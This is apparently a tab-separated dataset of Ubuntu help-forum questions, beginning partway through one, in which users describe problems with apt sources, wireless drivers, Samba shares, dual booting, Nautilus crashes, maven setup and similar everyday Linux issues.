please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms w : failed to fetch cdrom : //ubuntu 13.10 _saucy salamander_ - release amd64 ( 20131016.1 ) /dists/saucy/main/binary-i586/packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms w : failed to fetch cdrom : //ubuntu 13.10 _saucy salamander_ - release amd64 ( 20131016.1 ) /dists/saucy/restricted/binary-i586/packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms w : failed to fetch cdrom : //ubuntu 13.10 _saucy salamander_ - release amd64 ( 20131016.1 ) /dists/saucy/main/binary-i686/packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms w : failed to fetch cdrom : //ubuntu 13.10 _saucy salamander_ - release amd64 ( 20131016.1 ) /dists/saucy/restricted/binary-i686/packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms w : failed to fetch http : //dl.google.com/linux/chrome/deb/dists/stable/release unable to find expected entry 'main/binary-i586/packages ' in release file ( wrong sources.list entry or malformed file ) w : failed to fetch http : //archive.canonical.com/ubuntu/dists/saucy/release unable to find expected entry 'partner/binary-i586/packages ' in release file ( wrong sources.list entry or malformed file ) w : failed to fetch http : //extras.ubuntu.com/ubuntu/dists/saucy/release unable to find expected entry 'main/binary-i586/packages ' in release file ( wrong sources.list entry or malformed file ) w : failed to fetch http : //ppa.launchpad.net/appgrid/stable/ubuntu/dists/saucy/release unable to find expected entry 'main/binary-i586/packages ' in release file ( wrong sources.list entry or malformed file ) w : failed to fetch http : //ppa.launchpad.net/apt-fast/stable/ubuntu/dists/saucy/release unable to find expected entry 'main/binary-i586/packages ' in release file ( wrong sources.list entry or malformed file ) w : failed to fetch http : //ppa.launchpad.net/linrunner/tlp/ubuntu/dists/saucy/release unable to find expected entry 'main/binary-i586/packages ' in release file ( wrong sources.list entry or malformed file ) w : failed to fetch http : //ppa.launchpad.net/webupd8team/unstable/ubuntu/dists/saucy/release unable to find expected entry 'main/binary-i586/packages ' in release file ( wrong sources.list entry or malformed file ) w : failed to fetch ftp : //ftp.iitb.ac.in/distributions/ubuntu/archives/dists/saucy/release unable to find expected entry 'main/binary-i586/packages ' in release file ( wrong sources.list entry or malformed file ) w : failed to fetch ftp : //ftp.iitb.ac.in/distributions/ubuntu/archives/dists/saucy-updates/release unable to find expected entry 'main/binary-i586/packages ' in release file ( wrong sources.list entry or malformed file ) w : failed to fetch ftp : //ftp.iitb.ac.in/distributions/ubuntu/archives/dists/saucy-security/release unable to find expected entry 'main/binary-i586/packages ' in release file ( wrong sources.list entry or malformed file ) e : some index files failed to download . they have been ignored , or old ones used instead . i tried solving the issues using various answers within this forum which is asking to edit the sources.list file . but i dont have those content ( binary-i686 or binary-i586 ) in my sources.list file . can anybody help me to solve this issue ! ? please do n't forget to answer with the commands as i know very little about the linux terminal commands ! !
419837	ubuntu unity bar not showing arrow for active programs	i use ubuntu 13.04 at home and have xubuntu 12.10 at work . at home , every program that i have open will have a white arrow indicator so i can see what is currently running . at work , the arrow only shows on the application i am currently using . is it possible to change a setting so that i can get the arrow to show on all running application icons ?
419839	how do i use cut to make tab the delimiter ?	i am working with the egrep command and i need to pair with the cut ( and only cut ) command to change a `` : '' into a tab . for example change : blahblahblah:2000 to : blahblahblah 2000 i currently have this , but it turns the `` : '' into `` /t '' and not tab : egrep -e `` ^ [ 0-9 ] '' *.txt | cut -d `` : '' -- output-delimiter= '' /t '' -f 1- > test.txt
419840	virtual machines	i have 3 vms and i need to know weather they reside on one physical host or not , and if they not , i need to clone them to one physical host using openstack features . i am not sure how they were created because they were created by my prof . i have these informations : linux version 3.2.0-45-virtual ( buildd @ panlong ) ( gcc version 4.6.3 ( ubuntu/linaro 4.6.3-1ubuntu5 ) ) # 70-ubuntu smp wed may 29 20:31:52 utc 2013 the vms are : 10.242.144.92 10.242.144.89 10.242.144.90 can you help with any idea ?
419844	hardware independent ubuntu	sorry about my weird question in advance . my aim is to install ubuntu -actually lubuntu- on a usb disk . this is not a problem . i can and i am doing this . however , is it possible to use the same usb disk in different computers ? with different computers i mean different hardware . like installing lubuntu on a 32-bit computer with a specific hardware , and then plugging-in the usb into another 32-bit computer . can my lubuntu understand that the hardware is changed and fixes itself depending on the hardware ? is this method faster than live-usb ? i guess it is . but , the after the hardware change , will it become faster ? live-usb installation takes too long and works really really slow . i want to make the process faster . i want to plug the usb into computer and boot it as fast as possible . what can i do to speed up this process ? does installing lubuntu on a usb with computer a , and then plugging in the usb stick to computer b works ? does that usb stick , that operating system understand the hardware change and fix accordingly ? thank you very much in advance .
419847	upgrade from 13.04 to 13.10 through ssh	i was upgrading my ubuntu 13.04 to 13.10 through ssh . the download completed successfully but during the installation my ssh connection break . how can i install these upgraded files because any time i execute do-release-upgrade it is saying no new release found
419849	ubuntu installation not showing correct hdd size	i am a complete newbie to linux family ( been with windows till now ) . i am trying to install ubuntu from my usb drive so that my laptop has both windows 7 and ubuntu along side . when i am selecting the automatic installation option , incorrect hdd size is coming . for eg my hdd is of 320gb with close to 80 gb free but on the ubuntu installer it is showing something else . i am worried that by installing i do n't lose any data . here 're screenshots :
419853	mei_me unexpected reset	yesterday i experienced some troubles with my ubuntu installation . after reset , my system did n't start lightdm , all i saw was a black screen . i then logged in via ctrl + alt + f1 to terminal and saw i 'm getting the following error : mei_me 0000:00:03.0 : reset : connect/disconnect timeout . i then followed instructions found here . that kinda solved my problem , but i 'm still getting errors . i had some problems with the mouse jumping around . i then changed my desktop manager to kdm . but i 'm not sure if this solved the problem or just the reboot.. anyway it seems to be working now , but i still get some errors , i do n't know how to fix . here are the final few lines of dmesg : [ 280.812017 ] mei_me 0000:00:03.0 : reset : connect/disconnect timeout . [ 280.812025 ] mei_me 0000:00:03.0 : unexpected reset : dev_state = resetting [ 286.824027 ] mei_me 0000:00:03.0 : reset : connect/disconnect timeout . [ 286.824035 ] mei_me 0000:00:03.0 : unexpected reset : dev_state = resetting [ 292.836014 ] mei_me 0000:00:03.0 : reset : connect/disconnect timeout . [ 292.836022 ] mei_me 0000:00:03.0 : unexpected reset : dev_state = resetting [ 298.848019 ] mei_me 0000:00:03.0 : reset : connect/disconnect timeout . [ 298.848026 ] mei_me 0000:00:03.0 : unexpected reset : dev_state = resetting [ 304.860016 ] mei_me 0000:00:03.0 : reset : connect/disconnect timeout . [ 304.860024 ] mei_me 0000:00:03.0 : unexpected reset : dev_state = resetting [ 310.872015 ] mei_me 0000:00:03.0 : reset : connect/disconnect timeout . [ 310.872023 ] mei_me 0000:00:03.0 : unexpected reset : dev_state = resetting [ 369.179907 ] show_signal_msg : 99 callbacks suppressed [ 369.179912 ] chromium-browse [ 2938 ] : segfault at 30 ip ad3106d4 sp bfd30160 error 4 in fglrx_dri.so [ ac62f000+22d7000 ] [ 378.472980 ] chromium-browse [ 3061 ] : segfault at 30 ip ad2a86d4 sp bfce8960 error 4 in fglrx_dri.so [ ac5c7000+22d7000 ] [ 381.473299 ] chromium-browse [ 3086 ] : segfault at 30 ip ad3106d4 sp bfee6e50 error 4 in fglrx_dri.so [ ac62f000+22d7000 ] [ 550.590999 ] perf samples too long ( 2502 > 2500 ) , lowering kernel.perf_event_max_sample_rate to 50000 [ 702.692066 ] init : tty1 main process ended , respawning does anyone have some idea , what is going on ? any help would be much appreciated ! i have ubuntu 13.10 installed , fully updated ( i think ) . cpu : intel ( r ) core ( tm ) 2 duo cpu e8400 @ 3.00ghz gpu : advanced micro devices , inc. [ amd/ati ] cedar [ radeon hd 5000/6000/7350/8350 series ] by the way , i have kubuntu-desktop package installed .
419854	error at boot : ubuntu 13.10	i have replaced the optical disc drive in my acer v3-571g with a 2.5 '' sata hard drive . i have windows 8 on the 750gb hdd and ubuntu 13.10 on the 80gb hdd . when booting ubuntu 13.10 i get a black screen with white text , which says : [ 17.390706 ] usb 1-1.1 : string descriptor 0 read error : -22 the operating system resumes booting , but this message adds like 15 seconds to each boot , which is terrible ! i do n't have anything plugged into the usb ports on the laptop . what could be causing this issue , and how can i fix it ? any suggestions would be appreciated . thanks !
419859	i have difficulties with regex to pull certain information from a data file	the data i am working with data that has this format : 1880 20 david 7570 mabel 13096 i need to pull the year ( 1880 ) , the rank ( 20 ) , and the name only ( david or mabel ) . the end result is : 1880 20 david or 1880 20 mabel i have been successful in just pulling the year , rank and name seperately , but i have issues putting together a whole regular expression . i know the basics of regex , but i can not currently access my notes . i am attempting to use egrep .
419860	i want to shutdown my computer 12:30 am , but shutdown does nothing	cronjob of shutdown using vi : 30 00 * * * /sbin/shutdown -h now i have tried everything .
419867	qualcomm atheros ar9485 wireless network adapter not working on ubuntu 13.10	solution 1 hi i recently installed ubuntu 13.10 on my laptop alongside windows . i have an atheros ar9485 adapter . it worked well for a few weeks and now wo n't work anymore although it still works for the windows . i have tried out some of the solutions suggested but it still does n't work . this so what i have so far done and the answers i get ; $ sudo modprobe -r iwlwifi error : missing module name . fatal : error running remove command for iwlwifi $ sudo modprobe -r iwlwifi.conf fatal : module iwlwifi.conf not found . $ cd /etc /etc $ ls here i find the directory modprobe.d but modprobe does not exist so i try $ cd modprobe.d modprobe.d : no such file or directory then i go back to the /etc and try $ cd /etc $ cd modprobe.d /etc/modprobe.d $ ls i find the file iwlwifi.conf~ and try : /etc/modprobe.d $ sudo modprobe -r iwlwifi.conf~ fatal : module iwlwifi.conf~ not found . /etc/modprobe.d $ cd ~ $ sudo modprobe.d -r iwlwifi.conf~ sudo : modprobe.d : command not found i had read a solution that was giving the steps below if i had succeeded . i tried to look for the .conf file and edited it as directed in the last part of this solution but it did n't work and i was unable to go beyond that ; looks like this hardware has some problem with n configuration in wifi . please try : sudo modprobe -r iwlwifi sudo modprobe iwlwifi 11n_disable=1 now try to reconnect , if it helps follow below steps look into /etc/modprobe.d whether there are any file like intel-5100-iwlwifi-disable11n.conf then edit the file . sudo gedit /etc/modprobe.d/ < filename_here > edit the line that says options iwlwifi 11n_disable=1 to options iwlwifi 11n_disable=0 save and reboot . if no file exists , create a new file gksudo gedit /etc/modprobe.d/iwlwifi.conf add a new line : options iwlwifi 11n_disable=1 save and reboot . solution 2 : when solution 1 failed , i tried solution 2 as shown here below ; lspci -nnk | grep -ia2 net lsmod iwconfig rfkill list lspci -nnk | grep -ia2 net 01:00.0 ethernet controller [ 0200 ] : realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller [ 10ec:8136 ] ( rev 05 ) subsystem : acer incorporated [ ali ] device [ 1025:061f ] kernel driver in use : r8169 02:00.0 network controller [ 0280 ] : qualcomm atheros ar9485 wireless network adapter [ 168c:0032 ] ( rev 01 ) subsystem : foxconn international , inc. device [ 105b : e047 ] 03:00.0 unassigned class [ ff00 ] : realtek semiconductor co. , ltd. rts5209 pci express card reader [ 10ec:5209 ] ( rev 01 ) lsmod module size used by nls_iso8859_1 12713 1 parport_pc 32701 0 ppdev 17671 0 bnep 19564 2 rfcomm 69070 0 bluetooth 371874 10 bnep , rfcomm vesafb 13828 1 lp 17759 0 parport 42299 3 lp , ppdev , parport_pc hid_generic 12548 0 usbhid 53014 0 hid 101512 2 hid_generic , usbhid usb_storage 62062 1 rtsx_pci_sdmmc 23527 0 ahci 25819 2 libahci 31898 1 ahci rtsx_pci 45546 1 rtsx_pci_sdmmc r8169 67341 0 mii 13934 1 r8169 iwconfig eth0 no wireless extensions . lo no wireless extensions . rfkill list the last command did not give an output so i could not follow the instructions that were to come as shown below ; deactivate the hardware encryption of the driver : code : echo `` options ath9k nohwcrypt=1 '' | sudo tee /etc/modprobe.d/ath9k.conf sudo modprobe -rfv ath9k sudo modprobe -v ath9k any help either along these steps or any other solution will be appreciated .
419868	ubuntu & win8 dual boot from ssd . grub sometimes works , sometimes not	the situation is quite complex . i have a thinkpad x230 . i recovered windows 8 to a msata ssd , and install unbuntu 12.04 in the same ssd . i have used boot-repair to fix the boot problem ( by the way , it tells me buggy kernel is detected ) . the computer use ubfi to boot . now , sometimes the grub menu is correct and after i choose a system , it boots . sometimes no options in the grub menu at all . and sometimes , the options are correct , but after i select one , the screen goes black and forever . it drives me crazy !
419869	startx : could not open modules.dep.bin	i am helping a friend setup an ubuntu server , but since he is not familiar with terminal , i am installing a desktop . the ubuntu version is ubuntu 13.10 server edition . what i did was : sudo apt-get update next sudo apt-get install ubuntu-desktop everything seems to go smoothly thus far . next , i should be able to start the gui with : startx but when i try that i get this error message : libkmod : error ../libkmod/libkmod.c:554 kmod_search_moddep : could not open moddep file '/lib/modules/3.10.23-xxxx-std-ipv6-64/modules.dep.bin' i have obviously tried googling it , but i had no luck . can anyone help me out here ? reinstalling ubuntu with the desktop version is no choice , we rented the server and we do n't want to pay for reinstalling it . any help would be greatly appreciated . ps . we only have access to the server through ssh , and i recently setup a vnc connection to remote desktop .
419871	ubuntu ( wubi version ) can not connect to the internet network	i am new in the world of ubuntu . recently i installed the wubi version of ubuntu in my desktop and i have the following problem : it can not be connected to the wired network . when i use the pc in windows-7 mode everything is ok. ubuntu version : ubuntu 12.04.4 lts any idea of what can cause this problem ? some extra info about ethernet card : 02:00.0 ethernet controller [ 0200 ] : realtek semiconductor co. , ltd. rtl8111/8168/8411 pci express gigabit ethernet controller [ 10ec:8168 ] ( rev 06 ) thanks in advance .
419876	how to eject ramdisk ?	the following commands are how i create a ramdisk on ubuntu 12.04 lts : sudo mkdir -p /media/ramdisk sudo mount -t tmpfs -o size=1024m tmpfs /media/ramdisk but now i have no idea to eject it . these commands are what i 've tried but not work : sudo eject /media/ramdisk sudo umount /media/ramdisk how to eject ramdisk properly ?
419879	accidentally removed ubuntu-desktop and unity when removing compiz , how do i get them back ?	when i was trying to reinstall compiz , first i tried to remove it and i think i have deleted my ubuntu-desktop and unity at the same time . i have tried to reinstall them but no use and now i 'm stuck in a black screen after the ubuntu logo . no desktop , no unity , just a black screen and all i can do is reach the terminal through alt+ctrl+f1 so if anyone can help i would really appreciate it .
419881	unable to open sites through domain names in squid proxy server	how to open sites through domain names in proxy server ? i have already declared acl in the squid config file . please suggest me where do i have to declare acl : before or after the acl safe ports ?
419882	how to install ubuntu server 32 bit 12.0 on amd e1-2100 ?	i tried to install ubuntu 12.04 ( 32 bit ) server in my lenovo amd e1-2100 processor ,4gb ram . my host os is windows 8 ( 64 bit ) , with the help of virtual box i tried to install but its saying that processor does not support and need i686 supported version what shall i do ?
419886	flash error at adress when uploading blink led programme to iris mote by mib520 platform	i am trying to upload a blink led programme to iris mote by mib520 board . when i write make iris install,1 mib520 , /dev/ttyusb1 than its appear a error as : '' iris install,1 mib520 , /dev/ttyusb1 ident_flags tos_image bnp '' does not specify a valid target.stop '' and when i write make micaz install,1 mib520 , /dev/ttyusb1 than its appear error as : flash error at address 0x8a9 : files=0x95 , mem=0x00 . . . ( its as several times and at last ) fuse high byte set to 0xd9 . i tried this in xubuntu2.0 ( vmware player ) and xubuntu is installed by .iso file . can you please help me to solve this . thank you very much in advance . ashok .
419890	how to solve apt : command not found	i tried so many times to install mysql workbench and i faced many problems . the last one is in dependencies . i tried to solve that by typing : sudo apt -get install mysql-workbench-community-6.0.9-1ubu1204-i386.deb but unfortunately i got this error : sudo : apt : command not found how can i do that with ubuntu 12.04 ?
419892	software center redownloads zotero in any software installation	i have just installed zotero standalone by running these commands in terminal : sudo add-apt-repository ppa : smathot/cogscinl sudo apt-get update sudo apt-get install zotero-standalone and now i see that per installation of any package from the software center , zotero is downloaded again and as part of the details of the error message i get , it is indicated that the zotero folder already exists and the installation of zotero package failed ! ( this does n't corrupt the current installation of zotero on my machine ) . how can i solve this issue ? i have ubuntu 12.04 and zotero-standalone 4.0.17-ubuntu1 installed on my machine . thank you
419895	how to make ubuntu-13.10-server installation writable ?	i have downloaded and dd 'd a thumb drive with the ubuntu-13.10-server-amd64.iso file ( sudo dd if=ubuntu-13.10-server-amd64.iso of=/dev/rdisk3 ) . unfortunately , after the installation the thumb drive is not writable . chmod-ing the files do not work : the whole disk is viewed as a cd-rom . is it possible to make my non-writable usb thumb drive writable ? or are there any switches/flags to dd that would do the trick ? anything else that would do the trick ?
419899	fixed nautilus ( 13.10 , cairo dock ) crashes when i try to open `` pictures '' ( external disk ) or downloads or some folders that contain media	i 've been using ubuntu 13.10 with cairo dock for , maybe 2 or 3 months . i regularly upgrade ubuntu , but for the last couple of weeks i 've had this problem : from time to time , nautilus ( which i normally use via cairo dock ) crashes when i open the downloads folder ; and it always closes when i try to open a folder that i recently tried to copy to the desktop , wich is called pictures but which came from an external hard disk drive ( that has worked fine so far ) . later on , i tried to upload this folder `` pictures '' to ubuntu one just to see if maybe i could get to the files on it via web . ubuntu one did n't get the order . i do n't know if there might be some error with these pictures ( that come from a windows system ) , but it all started since i tried to see them on ubuntu 13.10. so , basically : i open the folder and it immediately closes , reporting nothing . i had n't had this problem with ubuntu 13.04. however , now i 'm having this problem when i do n't have the external disk drive connected . it just happens every now and then with downloads and some other folder , and every time with `` pictures '' . the problems that i have seen reported here talk something about dropbox , but i 'm not quite sure that 's my problem ( however , when i turn on the computer i also find a box that tells me to authenticate in order to exec /usr/bin/dropbox , but i dont really know what it means ) . i 've also seen people reporting about ubuntu one . although i used it when `` everything happened '' , i think it started right before i did . i 'm sorry if the questions are basic or if i have n't explained myself properly . it 's been only 4 months since i 've started using ubuntu and i 'm no master of anything technical at all . so , hopefully you could help me out solving this annoying problem . thanks a lot update : when i tried to open nautilus from the terminal , it told me the following ( i do n't understand ) : xxxx @ lemur : ~ $ nautilus initializing nautilus-dropbox 1.4.0 initializing arronax v0.04 ... sys:1 : warning : g_object_set : assertion 'g_is_object ( object ) ' failed nautilus-share-message : called `` net usershare info '' but it failed : the shared network returned the error 255 : net usershare : can not open usershare directory /var/lib/samba/usershares . error the file or folder doesnt exist please ask your system administrator to enable user sharing . totem-video-thumbnailer could n't open file 'file : ///home/xxxx/desktop/ % 20- % 20 % 20 % 5bmp3clan.com % 5d ( 1 ) .mp3' ( nautilus:4312 ) : gdkpixbuf-critical ** : gdk_pixbuf_loader_close : assertion 'gdk_is_pixbuf_loader ( loader ) ' failed ( nautilus:4312 ) : gdkpixbuf-critical ** : gdk_pixbuf_loader_get_pixbuf : assertion 'gdk_is_pixbuf_loader ( loader ) ' failed sys:1 : warning : g_object_unref : assertion 'g_is_object ( object ) ' failed segment violation xxxx @ lemur : ~ $ update : apparently , it all was a fail of nautilus-python i uninstalled python and so far it works fine . thanks !
419900	smb authentication not working	i 've recently created a windows file share ( smb ) . on linux however , it just says `` unable to mount location failed to mount windows share '' instead of asking for a username & password . on the shares regular users do n't have access to it says `` the folder contents could not be displayed . you do not have the permission necessary to view the contents of `` . on shares where `` everyone '' has permissions users can connect without problems . how do i make it that the linux clients ( ubuntu 12.04 ) can enter their password when accessing a limited access share instead of just getting an error message ?
419902	how to determine where missing linux partition started	i have an acer laptop with a 500 gb drive . it came with windows 7 installed , and i installed ubuntu 12.04 in a dual boot configuration . as far as i remember i installed everything accepting defaults all the way , but it was done over a year ago . when copying a file from the linux partition to the windows partition it crashed . of course this happened just after a lot of important work was done and before one of my ( far to infrequent ) backups was done . i do not have a `` rescue disk '' or backup of the partition table . i booted a 12.04.4 live cd , the disk utility shows that the linux partition has disappeared . everything else is there including the linux swap partition , but the linux partition is not listed , and its spot in the extended partition is shown as free space . i am assuming only the partition table was damaged and the linux partition is still there . the problem is determining exactly where the linux partition starts , to recreate the partition table entry . my understanding is that it must be at least 63 blocks after the start of the extended partition , but can be more . 1 ) what 's the best way to determine where the linux partition starts ? 2 ) can i just copy the partition table with sfdisk , edit it and rewrite it , reboot , then mount the volume , or is there more that needs to be done ?
419905	file share in samba	i can see my shared folder from windows . the shared folder is in my second hdd which is auto mounted . i can navigate into the shared folder but the users or even me do not have write permissions . please help ! here is a part of my smb.conf [ test ] guest account = nilanga writeable = yes write list = nilanga , @ miracle path = /tmp valid users = nilanga , @ miracle public = yes user = nilanga [ miracle ] guest account = nilanga writable = yes write list = nilanga , nilanka , @ miracle , @ adm path = /media/hdd2/data available = yes read only = no browseable = yes public = yes comment = miracle files on server valid users = nilanga , nilanka , @ miracle , @ adm create mode = 777 public = yes user = nilanga , nilanka directory mode = 777
419907	what does version mean in the .desktop file ?	while submitting an application to the ubuntu touch store , i got the following error message . `` desktop_version ( cliffhanger ) '' : { `` text '' : `` '0.3 ' does not match freedesktop.org version '1.0 ' '' } what does this mean and how do i fix it ?
419910	install hauppauge wintv-hvr 950q in ubutu 12.04	i bought the wintv-hvr 950q because it was reported to be linux compatible . i can not get the tuner to work in ubuntu . the tuner works great in the vista partition , but i want to get away from windows . i tried using the info at http : //ak33m.com/ ? p=211 . when attempting to scan this message comes up.. w_scan version 20111203 ( compiled for dvb api 5.4 ) using settings for united states atsc vsb us/ca , dvb-t tw frontend_type atsc , channellist 1 output format czap/tzap/szap/xine warning : could not guess your codepage . falling back to 'utf-8' output charset 'utf-8 ' , use -c to override info : using dvb adapter auto detection . main:3079 : fatal : no useable atsc card found . please check wether dvb driver is loaded and verify that no dvb application ( i.e . vdr ) is running .
419912	how to fix system is running in low graphics on toshiba sat a20 with tridant cyberblade xp2	i 'm a complete novice regarding linux . and have been trying to install ubuntu 13:10 on a toshiba a20 laptop using a usb mem stick . all seemed to go ok until it rebooted to a error `` system unable to identify graphic card '' '' install manually '' . looking through one of the start up files - there is a list of trident chip sets - except the xp2 - and a list of tests to try and identify the one fitted to the laptop . the machine will not go beyond this point . any ideas ? ? thanks and regards trevor
419913	can i reinstall nvidia drivers if corrupted and root is locked ?	i am currently unable to load the desktop ( ubuntu 13.10 , amd64 ) following installing 13.10 , then trying to install the latest nvidia driver ( x86-64-331.38 ) from tty ( after having to stop lightdm ) . the installation failed ( i do not remember the exact message ) ; when i rebooted i was unable to start the desktop . am i correct in thinking that the video driver is what is causing this ? here 's where it gets worse : i locked the root , so i am unable to uninstall/reinstall via root shell in recovery mode . all other options on the recovery screen end up hanging after a few lines ( a known bug ? ) . i have tried adding init=/bin/sh to the linux line in the grub file ; i have access to a shell here but get a warning ( `` ca n't access tty ; job control turned off '' ) and i can not ( or do not know how to ) run files . my question is : is there anything i can do to restore the video without having to wipe the computer and reinstall everything ? can i start up from cd ? i 'm not sure if this helps but i have an ubuntu ... iso file that i appear to have access to . i am happy to provide any additional information . thanks for any help .
419915	help identify confusing way maven is running with no m2_home ?	i am running ubuntu 12.04 and am a java developer who has recently moved off his desktop and started working on a new laptop . i have a few build issues and am investigating my install of maven . i got some help setting up my laptop and find the following maven configuration confusing . i have maven installed ( by a peer i assume ) and running but have no m2_home . i would have thought it would be a requirement . the following is my output when i run mvn -- version apache maven 3.0.4 maven home : /usr/share/maven java version : 1.7.0_51 , vendor : oracle corporation java home : /usr/lib/jvm/java-7-openjdk-amd64/jre default locale : en_gb , platform encoding : utf-8 os name : `` linux '' , version : `` 3.5.0-23-generic '' , arch : `` amd64 '' , family : `` unix '' none of the following give me anything : printenv | grep `` maven '' , printenv | grep `` mvn '' , printenv | grep `` m2 '' . stop laughing at my dismal grep technique . there is nothing special in ~/.profile or /etc/environment related to maven . can you provide any clues/direction as to why mvn -- version in the console gives output ?
419916	getting `` you do not have permission to copy this file '' while importing files from android	i 'm currently using ubuntu 12.04 dual booted with windows 7 and i 've downloaded all the restricted extras . but , still when i try to copy .mkv files from my android phone to my hard drive , i 'm receiving below error message you do not have permission to copy this file how can i resolve this problem ? is it due to the use of mtp protocol ?
419919	dual monitors : can not switch workspace on vga monitor	i have a dual monitor setup with an internal laptop monitor and an external vga monitor ( extended , not mirrored ) . when i now switch workspaces , this only happens on the internal monitor ; windows on the external monitor are always `` sticky '' ! what i would want is the workspace stretching over both the internal monitor as well as the extended external monitor , and switching workspaces should have the same effect on both monitors . i do not want to establish separated workspaces on each monitor which are switchable individually . this is a feature for which i found several questions here on the platform , but for my specific problem i was not able to find a solution or even a matching question ... my system is an ubuntu 13.10 ( currently with gnome shell ) with kernel 3.12 . the laptop has an nvidia optimus graphics adapter ; i basically always rely on the precessor 's internal graphics adapter . thanks in advance ! /edit : i resolved the issue now . it turned out that it is actually a gnome problem , this is why i did not find anything with my ubuntu related search attempts . you find the solution here : http : //gregcor.com/2011/05/07/fix-dual-monitors-in-gnome-3-aka-my-workspaces-are-broken/ the desired behavior is activated by executing gsettings set org.gnome.shell.overrides workspaces-only-on-primary false in a shell .
419920	is that possible to skip the step while adding repository ?	while i trying to add an repository by running , sudo add-apt-repository ppa : ubuntu-x-swat/x-updates it produces the ouput as , updated versions of x.org drivers , libraries , etc . for ubuntu . this ppa is for stable upstream releases of x.org components . if you 're looking for something even more bleeding-edge , please see the xorg-edgers ppa . while ubuntu does not `` officially/formally '' support these packages , if you discover problems when installing these debs please feel free to report bugs to launchpad . however , please make sure to clearly state that you are running packages from this ppa so we know the fixes need to come here . if you are upgrading from one release to another with this ppa activated , please install the ppa-purge package and use it to downgrade everything in here beforehand . sudo ppa-purge ppa : ubuntu-x-swat/x-updates will do it . [ directions for packaging drivers can be seen at https : //wiki.ubuntu.com/x/driverbuilding ] more info : https : //launchpad.net/~ubuntu-x-swat/+archive/x-updates press [ enter ] to continue or ctrl-c to cancel adding it i want to skip the step of asking me press [ enter ] to continue or ctrl-c to cancel adding it . is that possible.if yes , then how ?
419923	extracting a part of a massive csv file from command line	i want to read parts of a big csv file between rows n and m and between columns p and q . is there an easy way to do this easily with the shell ? ( are there commands i should read the doc 's ? otherwise , i 'll write a python script )
419924	file sync error ( auth_failed )	recently i started getting a file sync error on all 3 of my pcs running ubuntu one . one is running ubuntu , the other 2 are running windows 8 . looking at the list of clients on the web , none of them were there anymore . i found this article : ubuntu one : help : faqs—what should i do if authentication fails ? ( auth_failed state ) on how to fix the issue for my ubuntu pc and it worked perfectly . now i am looking for a similar fix for windows but have n't found one yet . i 've tried un-installing ubuntu one and re-installing it , but it must still be holding the keys somewhere because it never asked me to login again . does anyone know where i can clear these keys to get my files syncing on windows again ?
419928	how to remove installed packages	i installed a 32 bit mysql workbench packages . but i faced many problems and tried to find answers here ... then i 've known that my ubuntu is 64 bit ... and downloaded the version of mysql for 64 bit . when i 've typed : sudo dpkg -i mysql_64_bit.deb the system asked me to remove the oldest one so i typed : teeba @ ubuntu : ~/downloads $ sudo dpkg -r mysql-workbench-community-6.0.9-1ubu1204-i386.deb i 've gotten the following : dpkg : error : you must specify packages by their own names , not by quoting the names of the files they come in type dpkg -- help for help about installing and deinstalling packages [ * ] ; use `dselect ' or `aptitude ' for user-friendly package management ; type dpkg -dhelp for a list of dpkg debug flag values ; type dpkg -- force-help for a list of forcing options ; type dpkg-deb -- help for help about manipulating *.deb files ; options marked [ * ] produce a lot of output - pipe it through `less ' or `more ' ! can anyone give me the right way to install the right one and remove the oldest one ?
419929	how do you install ubuntu touch as a desktop environment ?	on another question someone mentioned that you could install ubuntu touch as a desktop environment for laptops with touchscreens . i have not been able to find this option . is there a way i could try this out ?
419930	missing icon on alt-tab list ubuntu 14.04	anyone updated to 14.04 and found missing icon while change to another window using alt-tab shortcut ? attached is mine , and any solution for this problem is highly appreciated .
419933	classic gnome sound settings	i can not get right side speaker balancer in sound settings of classic gnome 2 . how can i get it working in gnome also ?
419934	where is .xprofile in ubuntu 13.10 ?	the question is in the title . i have seen a few articles and answers talking about configuring .xprofile , file that is supposed to be in my home directory . i have selected `` show hidden files '' but .xprofile is nowhere to find . any idea ?
419937	reactivate menu in evince	the new evince for 13.10 without a menu bar mostly sucks from a usability perspective , but i 've gradually gotten used to it . however , i seem to have gotten myself into a situation where even the button i normally use to bring up the menu has disappeared . i can print by pressing ctrl-p , so not all functionality is lost , but i ca n't recover the menu . this question seems to be the same , but for lubuntu . note : only certain documents open in this way . for others , the toolbar is present .
419940	error in installing software from the ubuntu software center	i started using ubuntu a few days ago , so please a little help would be cool . whenever i try to install a package from the ubuntu software center it gives me the following error for everything . can anyone explain ? requires installation of untrusted packages this requires installing packages from unauthenticated sources . details libaacs0 libbluray1 libcddb2 libcrystalhd3 libdvbpsi7 libebml3 libiso9660-8 libmatroska5 libresid-builder0c2a libsdl-image1.2 libsdl1.2debian libsidplay2 libssh2-1 libtar0 libupnp6 libva-x11-1 libvcdinfo0 libwebp4 libxcb-keysyms1
419944	kitty - tmux unable to open hiperlinks during split session	i ca n't open hiperlinks in kitty ssh when using tmux with splitted session . i can open links in tmux if session is not splitted , but if tmux session is splitted i ca n't . was looking for solution on internet but i did n't find anything . hyperlinks in kitty are enabled .
419945	how does one install pygobject from the official repository ?	i want to install the pygobject package on my ubuntu 13.10 . i tried the jhbuild option but i got stuck at the end of a very lengthy process . the tutorial website of pygobject says that it comes packaged with all its dependencies for nearly all linux distros and it can be installed from the official repository of a distribution . i looked for it on the software center but could n't find it . all it returned it was some spellchecking libraries and development headers for gobject python bindings ( i am a beginner so please let me know if this is what i need to build pygtk applications in python 3.3.2 ) . i am guessing this needs to be installed using the command line interface but ca n't figure out how .
419951	installing ubuntu to 8gb flash drive but required download size is 8.6gb	i am trying to install either ubuntu 12.04 or 13.10 from a bootable flash drive with the .iso file to be installed on a 8gb flash drive . the install directions listed on the site claim to require only 5.6 gb , but when i begin to install ubuntu it does not allow me to proceed stating a requirement of 8.6 gb minimum . is this tutorial outdated ? do the newer versions require more disk space ? is there any way to install a stripped down version ?
419957	brightness can not be controlled in sony vaio laptop	brightness is not varying . the screen is seemed to be in maximum brightness . help me somebody please .
